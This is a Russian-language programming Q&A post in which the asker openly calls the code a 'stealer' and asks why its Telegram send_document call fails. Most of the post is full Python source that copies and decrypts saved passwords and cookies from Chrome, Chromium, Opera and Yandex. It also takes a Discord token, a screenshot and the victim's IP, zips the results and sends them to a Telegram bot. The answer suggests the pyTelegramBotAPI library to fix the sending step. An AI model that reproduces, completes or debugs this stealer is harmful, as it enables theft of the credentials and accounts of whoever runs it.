# TypeError: send_document() takes 1 positional argument but 3 were given

Tags: python, telegram-bot, telegram

Никто не подскажет почему send_document() не работает? Выдает такую ошибку:

> TypeError: send_document() takes 1 positional argument but 3 were given

Это TelegramAPI. Начал изучать питон, в качестве ознакомления решил использовать стиллер с отправкой в телеграмм, но столкнулся с ошибкой.

```
import os
import sqlite3
import win32crypt
import telebot
import shutil
import requests
import zipfile
from PIL import ImageGrab
import cv2
import platform

username = os.getlogin()

token = "-"
chat_id = "-"
bot = telebot.TeleBot(token)

def Chrome(): # Создаём функцию
   text = 'Passwords Chrome:' + '\n'
   text += 'URL | LOGIN | PASSWORD' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'): 
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')

       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') 
       cursor = conn.cursor()
       cursor.execute('SELECT action_url, username_value, password_value FROM logins') 
       for result in cursor.fetchall():
           password = win32crypt.CryptUnprotectData(result[2])[1].decode()
           login = result[1]
           url = result[0]
           if password != '':
               text += url + ' | ' + login + ' | ' + password + '\n' 

file = open(os.getenv("APPDATA") + '\\google_pass.txt', "w+")
file.write(str(Chrome()) + '\n')
file.close()

def Chrome_cockie():
   textc = 'Cookies Chrome:' + '\n'
   textc += 'URL | COOKIE | COOKIE NAME' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
       cursor = conn.cursor()
       cursor.execute("SELECT * from cookies")
       for result in cursor.fetchall():
           cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
           name = result[2]
           url = result[1]
           textc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
   return textc
file = open(os.getenv("APPDATA") + '\\google_cookies.txt', "w+") 
file.close()

def Yandex():
   texty = 'YANDEX Cookies:' + '\n'
   texty += 'URL | COOKIE | COOKIE NAME' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies'):
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies2')
       cursor = conn.cursor()
       cursor.execute("SELECT * from cookies")
       for result in cursor.fetchall():
           cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
           name = result[2]
           url = result[1]
           texty += url + ' | ' + str(cookie) + ' | ' + name + '\n'
   return texty
file = open(os.getenv("APPDATA") + '\\yandex_cookies.txt', "w+")
file.write(str(Yandex()) + '\n')
file.close()

def chromium():
   textch = '\n' + 'Chromium Passwords:' + '\n'
   textch += 'URL | LOGIN | PASSWORD' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default'):
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data2')
       cursor = conn.cursor()
       cursor.execute('SELECT action_url, username_value, password_value FROM logins')
       for result in cursor.fetchall():
           password = win32crypt.CryptUnprotectData(result[2])[1].decode()
           login = result[1]
           url = result[0]
           if password != '':
               textch += url + ' | ' + login + ' | ' + password + '\n'
               return textch
file = open(os.getenv("APPDATA") + '\\chromium.txt', "w+")
file.write(str(chromium()) + '\n')
file.close()

def Opera():
   texto = 'Passwords Opera:' + '\n'
   texto += 'URL | LOGIN | PASSWORD' + '\n'
   if os.path.exists(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data'):
       shutil.copy2(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data', os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
       conn = sqlite3.connect(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
       cursor = conn.cursor()
       cursor.execute('SELECT action_url, username_value, password_value FROM logins')
       for result in cursor.fetchall():
           password = win32crypt.CryptUnprotectData(result[2])[1].decode()
           login = result[1]
           url = result[0]
           if password != '':
               texto += url + ' | ' + login + ' | ' + password + '\n'

file = open(os.getenv("APPDATA") + '\\opera_pass.txt', "w+")
file.write(str(Opera()) + '\n')
file.close()

def Opera_c():
    textoc = '\n' + 'Cookies Opera:' + '\n'
    textoc += 'URL | COOKIE | COOKIE NAME' + '\n'
    if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
      shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
      conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
      cursor = conn.cursor()
      cursor.execute("SELECT * from cookies")
      for result in cursor.fetchall():
           cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
           name = result[2]
           url = result[1]
           textoc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
    return textoc

file = open(os.getenv("APPDATA") + '\\opera_cookies.txt', "w+")
file.write(str(Opera_c()) + '\n')
file.close()

def discord_token():
   if os.path.isfile(os.getenv("APPDATA") + '/discord/Local Storage/https_discordapp.com_0.localstorage') is True:
       token = ''
       conn = sqlite3.connect(os.getenv("APPDATA") + "/discord/Local Storage/https_discordapp.com_0.localstorage")
       cursor = conn.cursor()
       for row in cursor.execute("SELECT key, value FROM ItemTable WHERE key='token'"):
           token = row[1].decode("utf-16")
       conn.close()
       if token != '':
           return token
       else:
           return 'Discord exists, but not logged in'
   else:
       return 'Not found'
ds_token = discord_token()
ds_token += 'Discord token:' + '\n' + discord_token() + '\n' + '\n'

file = open(os.getenv("APPDATA") + '\\discord_token.txt', "w+")
file.write(str(discord_token()) + '\n')
file.close()

screen = ImageGrab.grab()
screen.save(os.getenv("APPDATA") + '\\screenshot.jpg')

def info():    
    r = requests.get('http://ip.42.pl/raw')
    IP = r.text
    windows = platform.platform()
    processor = platform.processor()
    systemali = platform.version() 
    bot.send_message(chat_id, "PC: " + username + "\nIP: " + IP + "\nOS: " + windows +
        "\nProcessor: " + processor + "\nVersion OS : " + systemali)

zname=r'C:\ProgramData\LOG.zip'
newzip=zipfile.ZipFile(zname,'w')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\google_pass.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\google_cookies.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\yandex_cookies.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\chromium.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\opera_pass.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\opera_cookies.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\discord_token.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\screenshot.jpg')
newzip.close()

doc = open("C:\ProgramData\LOG.zip", 'rb')

bot.send_document(chat_id, doc)
info()
```

Comment: Будет намного проще разобраться в вашей проблемме, если вы выложите полный стэктэйс ошибки

Comment: Ваша ошибка наверняка локализованна в одном методе, и нет необходимости выкладывать весь код. Я бы рекомендовал вам попробовать локализовать проблемную часть кода и выложить только ее

Comment: В скомпилированном .exe при запуске выдает это: https://imgur.com/vV0puBb
Консоль закрывается, в телеграмме ничего нет.

Answer (score 0):

В базовом классе `telebot` метод `send_document()` ожидает передачи только параметра `self` и он не реализован. [Смотреть](https://github.com/KyleJamesWalker/telebot/blob/414a346357d4f474cdaf6d843c812454b20d2456/telebot/__init__.py#L165)
Попробуйте использовать `pyTelegramBotAPI` [Посмотреть тут](https://github.com/eternnoir/pyTelegramBotAPI)